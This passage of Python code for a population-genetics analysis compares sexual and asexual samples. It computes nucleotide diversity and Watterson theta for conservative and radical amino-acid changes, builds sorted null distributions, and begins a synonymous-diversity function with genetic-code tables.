asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
else:
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
aaList1 = []
aaList2 = []
for comp in codonList1:
if i < 3:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i < 3:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
asex_synS += 2
asex_sum2PQ_S += (2*twoPQ)
i += 1
# --- Per-replicate summary statistics -------------------------------------
# pi (nucleotide diversity) and theta (Watterson) for each conservative (C)
# and radical (R) amino-acid class, each normalized by the synonymous value,
# then the asex-minus-sex differences D1..D4 that feed the null distributions.
#
# n/(n-1) sample-size correction factors, hoisted out of the 34 expressions
# that previously recomputed them.
# NOTE(review): if this runs under Python 2 with integer len() values, these
# divisions are floor divisions (== 1 for n >= 2) — confirm intended semantics.
sexCorr = len(sexList)/(len(sexList)-1)
asexCorr = len(asexList)/(len(asexList)-1)
sexPiS = sexCorr*(sex_sum2PQ_S/sexSynSites)
sexPiC1_PiS = (sexCorr*(sex_sum2PQ_C1/sexC1Sites))/sexPiS
sexPiC2_PiS = (sexCorr*(sex_sum2PQ_C2/sexC2Sites))/sexPiS
sexPiC3_PiS = (sexCorr*(sex_sum2PQ_C3/sexC3Sites))/sexPiS
sexPiC4_PiS = (sexCorr*(sex_sum2PQ_C4/sexC4Sites))/sexPiS
sexPiC5_PiS = (sexCorr*(sex_sum2PQ_C5/sexC5Sites))/sexPiS
sexPiC6_PiS = (sexCorr*(sex_sum2PQ_C6/sexC6Sites))/sexPiS
sexPiC7_PiS = (sexCorr*(sex_sum2PQ_C7/sexC7Sites))/sexPiS
sexPiCMean_PiS = (sexCorr*(sex_sum2PQ_meanC/sexMeanCSites))/sexPiS
sexPiR1_PiS = (sexCorr*(sex_sum2PQ_R1/sexR1Sites))/sexPiS
# BUGFIX: R2-R7 previously reused sex_sum2PQ_R1/sexR1Sites (copy-paste);
# each radical class now uses its own numerator and site count, matching
# the per-class pattern used by the theta block below.
sexPiR2_PiS = (sexCorr*(sex_sum2PQ_R2/sexR2Sites))/sexPiS
sexPiR3_PiS = (sexCorr*(sex_sum2PQ_R3/sexR3Sites))/sexPiS
sexPiR4_PiS = (sexCorr*(sex_sum2PQ_R4/sexR4Sites))/sexPiS
sexPiR5_PiS = (sexCorr*(sex_sum2PQ_R5/sexR5Sites))/sexPiS
sexPiR6_PiS = (sexCorr*(sex_sum2PQ_R6/sexR6Sites))/sexPiS
sexPiR7_PiS = (sexCorr*(sex_sum2PQ_R7/sexR7Sites))/sexPiS
sexPiRMean_PiS = (sexCorr*(sex_sum2PQ_meanR/sexMeanRSites))/sexPiS
asexPiS = asexCorr*(asex_sum2PQ_S/asexSynSites)
asexPiC1_PiS = (asexCorr*(asex_sum2PQ_C1/asexC1Sites))/asexPiS
asexPiC2_PiS = (asexCorr*(asex_sum2PQ_C2/asexC2Sites))/asexPiS
asexPiC3_PiS = (asexCorr*(asex_sum2PQ_C3/asexC3Sites))/asexPiS
asexPiC4_PiS = (asexCorr*(asex_sum2PQ_C4/asexC4Sites))/asexPiS
asexPiC5_PiS = (asexCorr*(asex_sum2PQ_C5/asexC5Sites))/asexPiS
asexPiC6_PiS = (asexCorr*(asex_sum2PQ_C6/asexC6Sites))/asexPiS
asexPiC7_PiS = (asexCorr*(asex_sum2PQ_C7/asexC7Sites))/asexPiS
asexPiCMean_PiS = (asexCorr*(asex_sum2PQ_meanC/asexMeanCSites))/asexPiS
asexPiR1_PiS = (asexCorr*(asex_sum2PQ_R1/asexR1Sites))/asexPiS
# BUGFIX: same R2-R7 copy-paste fix as the sexual sample above.
asexPiR2_PiS = (asexCorr*(asex_sum2PQ_R2/asexR2Sites))/asexPiS
asexPiR3_PiS = (asexCorr*(asex_sum2PQ_R3/asexR3Sites))/asexPiS
asexPiR4_PiS = (asexCorr*(asex_sum2PQ_R4/asexR4Sites))/asexPiS
asexPiR5_PiS = (asexCorr*(asex_sum2PQ_R5/asexR5Sites))/asexPiS
asexPiR6_PiS = (asexCorr*(asex_sum2PQ_R6/asexR6Sites))/asexPiS
asexPiR7_PiS = (asexCorr*(asex_sum2PQ_R7/asexR7Sites))/asexPiS
asexPiRMean_PiS = (asexCorr*(asex_sum2PQ_meanR/asexMeanRSites))/asexPiS
# Watterson theta per class, normalized by the synonymous theta.
sexThetaS = sex_synS/(sexAn*sexSynSites)
sexThetaC1_ThetaS = (sex_con1S/(sexAn*sexC1Sites))/sexThetaS
sexThetaC2_ThetaS = (sex_con2S/(sexAn*sexC2Sites))/sexThetaS
sexThetaC3_ThetaS = (sex_con3S/(sexAn*sexC3Sites))/sexThetaS
sexThetaC4_ThetaS = (sex_con4S/(sexAn*sexC4Sites))/sexThetaS
sexThetaC5_ThetaS = (sex_con5S/(sexAn*sexC5Sites))/sexThetaS
sexThetaC6_ThetaS = (sex_con6S/(sexAn*sexC6Sites))/sexThetaS
sexThetaC7_ThetaS = (sex_con7S/(sexAn*sexC7Sites))/sexThetaS
sexThetaCMean_ThetaS = (sex_meanConS/(sexAn*sexMeanCSites))/sexThetaS
sexThetaR1_ThetaS = (sex_rad1S/(sexAn*sexR1Sites))/sexThetaS
sexThetaR2_ThetaS = (sex_rad2S/(sexAn*sexR2Sites))/sexThetaS
sexThetaR3_ThetaS = (sex_rad3S/(sexAn*sexR3Sites))/sexThetaS
sexThetaR4_ThetaS = (sex_rad4S/(sexAn*sexR4Sites))/sexThetaS
sexThetaR5_ThetaS = (sex_rad5S/(sexAn*sexR5Sites))/sexThetaS
sexThetaR6_ThetaS = (sex_rad6S/(sexAn*sexR6Sites))/sexThetaS
sexThetaR7_ThetaS = (sex_rad7S/(sexAn*sexR7Sites))/sexThetaS
sexThetaRMean_ThetaS = (sex_meanRadS/(sexAn*sexMeanRSites))/sexThetaS
asexThetaS = asex_synS/(asexAn*asexSynSites)
asexThetaC1_ThetaS = (asex_con1S/(asexAn*asexC1Sites))/asexThetaS
asexThetaC2_ThetaS = (asex_con2S/(asexAn*asexC2Sites))/asexThetaS
asexThetaC3_ThetaS = (asex_con3S/(asexAn*asexC3Sites))/asexThetaS
asexThetaC4_ThetaS = (asex_con4S/(asexAn*asexC4Sites))/asexThetaS
asexThetaC5_ThetaS = (asex_con5S/(asexAn*asexC5Sites))/asexThetaS
asexThetaC6_ThetaS = (asex_con6S/(asexAn*asexC6Sites))/asexThetaS
asexThetaC7_ThetaS = (asex_con7S/(asexAn*asexC7Sites))/asexThetaS
asexThetaCMean_ThetaS = (asex_meanConS/(asexAn*asexMeanCSites))/asexThetaS
asexThetaR1_ThetaS = (asex_rad1S/(asexAn*asexR1Sites))/asexThetaS
asexThetaR2_ThetaS = (asex_rad2S/(asexAn*asexR2Sites))/asexThetaS
asexThetaR3_ThetaS = (asex_rad3S/(asexAn*asexR3Sites))/asexThetaS
asexThetaR4_ThetaS = (asex_rad4S/(asexAn*asexR4Sites))/asexThetaS
asexThetaR5_ThetaS = (asex_rad5S/(asexAn*asexR5Sites))/asexThetaS
asexThetaR6_ThetaS = (asex_rad6S/(asexAn*asexR6Sites))/asexThetaS
asexThetaR7_ThetaS = (asex_rad7S/(asexAn*asexR7Sites))/asexThetaS
asexThetaRMean_ThetaS = (asex_meanRadS/(asexAn*asexMeanRSites))/asexThetaS
# Asexual-minus-sexual differences for the null distributions:
# D1 = pi conservative, D2 = pi radical, D3 = theta conservative,
# D4 = theta radical (classes 1-7 plus the mean class).
D1_1 = asexPiC1_PiS - sexPiC1_PiS #pi conservative
D1_2 = asexPiC2_PiS - sexPiC2_PiS #pi conservative
D1_3 = asexPiC3_PiS - sexPiC3_PiS #pi conservative
D1_4 = asexPiC4_PiS - sexPiC4_PiS #pi conservative
D1_5 = asexPiC5_PiS - sexPiC5_PiS #pi conservative
D1_6 = asexPiC6_PiS - sexPiC6_PiS #pi conservative
D1_7 = asexPiC7_PiS - sexPiC7_PiS #pi conservative
D1_Mean = asexPiCMean_PiS - sexPiCMean_PiS #pi conservative
D2_1 = asexPiR1_PiS - sexPiR1_PiS #pi radical
D2_2 = asexPiR2_PiS - sexPiR2_PiS #pi radical
D2_3 = asexPiR3_PiS - sexPiR3_PiS #pi radical
D2_4 = asexPiR4_PiS - sexPiR4_PiS #pi radical
D2_5 = asexPiR5_PiS - sexPiR5_PiS #pi radical
D2_6 = asexPiR6_PiS - sexPiR6_PiS #pi radical
D2_7 = asexPiR7_PiS - sexPiR7_PiS #pi radical
D2_Mean = asexPiRMean_PiS - sexPiRMean_PiS #pi radical
D3_1 = asexThetaC1_ThetaS - sexThetaC1_ThetaS #theta conservative
D3_2 = asexThetaC2_ThetaS - sexThetaC2_ThetaS #theta conservative
D3_3 = asexThetaC3_ThetaS - sexThetaC3_ThetaS #theta conservative
D3_4 = asexThetaC4_ThetaS - sexThetaC4_ThetaS #theta conservative
D3_5 = asexThetaC5_ThetaS - sexThetaC5_ThetaS #theta conservative
D3_6 = asexThetaC6_ThetaS - sexThetaC6_ThetaS #theta conservative
D3_7 = asexThetaC7_ThetaS - sexThetaC7_ThetaS #theta conservative
D3_Mean = asexThetaCMean_ThetaS - sexThetaCMean_ThetaS #theta conservative
D4_1 = asexThetaR1_ThetaS - sexThetaR1_ThetaS #theta radical
D4_2 = asexThetaR2_ThetaS - sexThetaR2_ThetaS #theta radical
D4_3 = asexThetaR3_ThetaS - sexThetaR3_ThetaS #theta radical
D4_4 = asexThetaR4_ThetaS - sexThetaR4_ThetaS #theta radical
D4_5 = asexThetaR5_ThetaS - sexThetaR5_ThetaS #theta radical
D4_6 = asexThetaR6_ThetaS - sexThetaR6_ThetaS #theta radical
D4_7 = asexThetaR7_ThetaS - sexThetaR7_ThetaS #theta radical
D4_Mean = asexThetaRMean_ThetaS - sexThetaRMean_ThetaS #theta radical
# Append this replicate's D statistics to the accumulating null-distribution
# lists held in the D1..D4 dicts (keys 1-7 plus 'mean').
# The original read each list into a temporary, appended, then wrote it back
# — and contained a copy-paste bug: currD2_1 was read from D1[1], so D2_1
# values were appended to D1[1] and D2[1] ended up aliased to D1[1].
# Appending in place fixes the bug and removes the redundant round-trip
# (the dict values are lists, so no write-back is needed).
D1[1].append(D1_1)
D1[2].append(D1_2)
D1[3].append(D1_3)
D1[4].append(D1_4)
D1[5].append(D1_5)
D1[6].append(D1_6)
D1[7].append(D1_7)
D1['mean'].append(D1_Mean)
D2[1].append(D2_1)
D2[2].append(D2_2)
D2[3].append(D2_3)
D2[4].append(D2_4)
D2[5].append(D2_5)
D2[6].append(D2_6)
D2[7].append(D2_7)
D2['mean'].append(D2_Mean)
D3[1].append(D3_1)
D3[2].append(D3_2)
D3[3].append(D3_3)
D3[4].append(D3_4)
D3[5].append(D3_5)
D3[6].append(D3_6)
D3[7].append(D3_7)
D3['mean'].append(D3_Mean)
D4[1].append(D4_1)
D4[2].append(D4_2)
D4[3].append(D4_3)
D4[4].append(D4_4)
D4[5].append(D4_5)
D4[6].append(D4_6)
D4[7].append(D4_7)
D4['mean'].append(D4_Mean)
def _appendLog(message):
    # Open in append mode and close immediately after each message so the
    # progress log survives a crash mid-run (same behavior as the original
    # repeated open/write/close triples).
    logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
    logfile.write(message)
    logfile.close()

_appendLog('Finished calculating population genetic parameters\nSorting Population Genetic Parameters\n')
# Sort all 32 null distributions (D1-D4 x classes 1-7 + 'mean'). As in the
# original, a percent-complete line is logged after each of the first 31
# sorts; the 32nd is followed by the "Finished sorting" message instead.
# This replaces 32 copy-pasted sort + open/write/close stanzas, and drops
# the original's redundant double logfile.close() calls.
sortedD = {}
_sortCount = 0
for _distName, _dist in (('D1',D1),('D2',D2),('D3',D3),('D4',D4)):
    for _class in (1,2,3,4,5,6,7,'mean'):
        sortedD[(_distName,_class)] = sorted(_dist[_class])
        _sortCount += 1
        if _sortCount < 32:
            _appendLog('\t' + str(round(100*(_sortCount/32.0))) + '% complete\n')
_appendLog('Finished sorting population genetic parameters\nWriting output to standard out\n')
# Column order matches the original header exactly: the four mean columns
# first, then the seven classes of each distribution in turn.
_columns = [('D1','mean'),('D2','mean'),('D3','mean'),('D4','mean')]
for _distName in ('D1','D2','D3','D4'):
    for _class in (1,2,3,4,5,6,7):
        _columns.append((_distName,_class))
sys.stdout.write('D1_mean\tD2_mean\tD3_mean\tD4_mean\tD1_1\tD1_2\tD1_3\tD1_4\tD1_5\tD1_6\tD1_7\tD2_1\tD2_2\tD2_3\tD2_4\tD2_5\tD2_6\tD2_7\tD3_1\tD3_2\tD3_3\tD3_4\tD3_5\tD3_6\tD3_7\tD4_1\tD4_2\tD4_3\tD4_4\tD4_5\tD4_6\tD4_7\n')
i = 0
while i < 10000:
    # One tab-separated row per rank across all 32 sorted distributions.
    sys.stdout.write('\t'.join(str(sortedD[_col][i]) for _col in _columns) + '\n')
    i += 1
def polSubSyn(fasta, code='invertebrateMt'):
    """Build a null distribution of synonymous-diversity differences.

    Repeatedly (10,000 times) draws a random "sexual" subsample (n=8) and a
    disjoint "asexual" subsample (n=23) from the population sequences in
    *fasta*, computes synonymous nucleotide diversity (piS) and Watterson's
    thetaS for each subsample, and records the asexual-minus-sexual
    difference for both statistics.  The two sorted null distributions are
    written to standard out (tab-separated, one row per replicate); progress
    messages go to 'mt_nullDistribution_Synonymous.log'.

    Parameters:
        fasta: path to the aligned FASTA file, consumed by buildCodonDict
            (defined elsewhere in this file).
        code:  key selecting the genetic code table (default
            'invertebrateMt'); any NCBI-style table name listed in
            codeOverrides below is accepted.

    Returns:
        None.  Output is side effects only (stdout + log file).

    Fixes relative to the original implementation:
      * D2['thetaS'] was assigned the piS list, so the theta column
        duplicated the pi column.
      * One progress line was written to a misspelled log file
        ('...Synonymouss.log').
      * In the outgroup-rooted three-allele case, the codonC branch built
        its codon pair lists from codonA, so the 2pq term used the wrong
        allele frequency.
      * The n/(n-1) pi correction is now explicit float division (under
        Python 2, 8/7 and 23/22 truncated to 1).
      * Dead code removed: the per-gene position lookup (positionDict/gene),
        the unused variableSites list, refSeq and outSeq.
    """
    # The universal (standard) genetic code; every other table below is
    # expressed as a small set of codon reassignments on top of it.
    standard = {
        'TTT': 'F', 'TTC': 'F', 'TTA': 'L', 'TTG': 'L',
        'CTT': 'L', 'CTC': 'L', 'CTA': 'L', 'CTG': 'L',
        'ATT': 'I', 'ATC': 'I', 'ATA': 'I', 'ATG': 'M',
        'GTT': 'V', 'GTC': 'V', 'GTA': 'V', 'GTG': 'V',
        'TCT': 'S', 'TCC': 'S', 'TCA': 'S', 'TCG': 'S',
        'CCT': 'P', 'CCC': 'P', 'CCA': 'P', 'CCG': 'P',
        'ACT': 'T', 'ACC': 'T', 'ACA': 'T', 'ACG': 'T',
        'GCT': 'A', 'GCC': 'A', 'GCA': 'A', 'GCG': 'A',
        'TAT': 'Y', 'TAC': 'Y', 'TAA': '*', 'TAG': '*',
        'CAT': 'H', 'CAC': 'H', 'CAA': 'Q', 'CAG': 'Q',
        'AAT': 'N', 'AAC': 'N', 'AAA': 'K', 'AAG': 'K',
        'GAT': 'D', 'GAC': 'D', 'GAA': 'E', 'GAG': 'E',
        'TGT': 'C', 'TGC': 'C', 'TGA': '*', 'TGG': 'W',
        'CGT': 'R', 'CGC': 'R', 'CGA': 'R', 'CGG': 'R',
        'AGT': 'S', 'AGC': 'S', 'AGA': 'R', 'AGG': 'R',
        'GGT': 'G', 'GGC': 'G', 'GGA': 'G', 'GGG': 'G',
    }
    # Per-table reassignments, verified against the original inline tables.
    codeOverrides = {
        'standard': {},
